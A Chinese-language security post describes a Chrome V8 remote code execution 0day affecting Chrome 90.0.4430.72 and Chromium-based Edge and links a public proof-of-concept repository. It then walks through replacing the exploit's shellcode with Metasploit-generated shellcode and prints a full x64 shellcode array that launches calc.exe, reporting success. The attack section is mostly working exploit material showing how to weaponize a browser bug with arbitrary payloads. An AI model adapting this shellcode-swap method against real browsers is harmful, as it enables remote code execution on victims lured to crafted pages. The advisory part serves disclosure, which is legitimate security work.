No1：Chrome V8引擎远程代码执行0day

漏洞背景：

该漏洞影响Chrome最新正式版（90.0.4430.72）以及基于Chromium内核的Microsoft Edge正式版（89.0.774.77）以下版本。

漏洞POC(https://github.com/avboy1337/1195777-chrome0day)

漏洞描述：

攻击者可通过构造特制web页面并诱导受害者访问来利用此漏洞获得远程代码执行。
Google Chrome是由Google开发的免费网页浏览器。许多第三方浏览器使用Chromium内核，这些浏览器同样会受该0day漏洞影响。

漏洞概览：

漏洞编号
- 暂无
漏洞等级
- 严重
影响版本
- Google Chrome <= 90.0.4430.72
- 基于Chromium内核的Microsoft Edge <= 89.0.774.77
- 其他基于V8引擎的第三方浏览器

目前Google暂未修复该漏洞，该漏洞仍为0day状态。建议在官方未修复漏洞期间，谨慎使用或者切换使用其他浏览器。

No2:POC复现替换MSFpayload

0x01:生成自己的payload

通过查看POC代码，可以看到shellcode可执行部分是可以替换的，达成我们想要的效果，那么我们试试MSF生成自己的shellcode。

这里我们替换原文的shellcode，达到弹出计算器的目的。

    let shellcode = [0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52
,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48
,0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9
,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41
,0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48
,0x01,0xd0,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01
,0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48
,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0
,0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c
,0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0
,0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04
,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59
,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48
,0x8b,0x12,0xe9,0x57,0xff,0xff,0xff,0x5d,0x48,0xba,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x48,0x8d,0x8d,0x01,0x01,0x00,0x00,0x41,0xba,0x31,0x8b,0x6f
,0x87,0xff,0xd5,0xbb,0xf0,0xb5,0xa2,0x56,0x41,0xba,0xa6,0x95,0xbd,0x9d,0xff
,0xd5,0x48,0x83,0xc4,0x28,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb
,0x47,0x13,0x72,0x6f,0x6a,0x00,0x59,0x41,0x89,0xda,0xff,0xd5,0x63,0x61,0x6c
,0x63,0x2e,0x65,0x78,0x65,0x00];

成功弹出计算器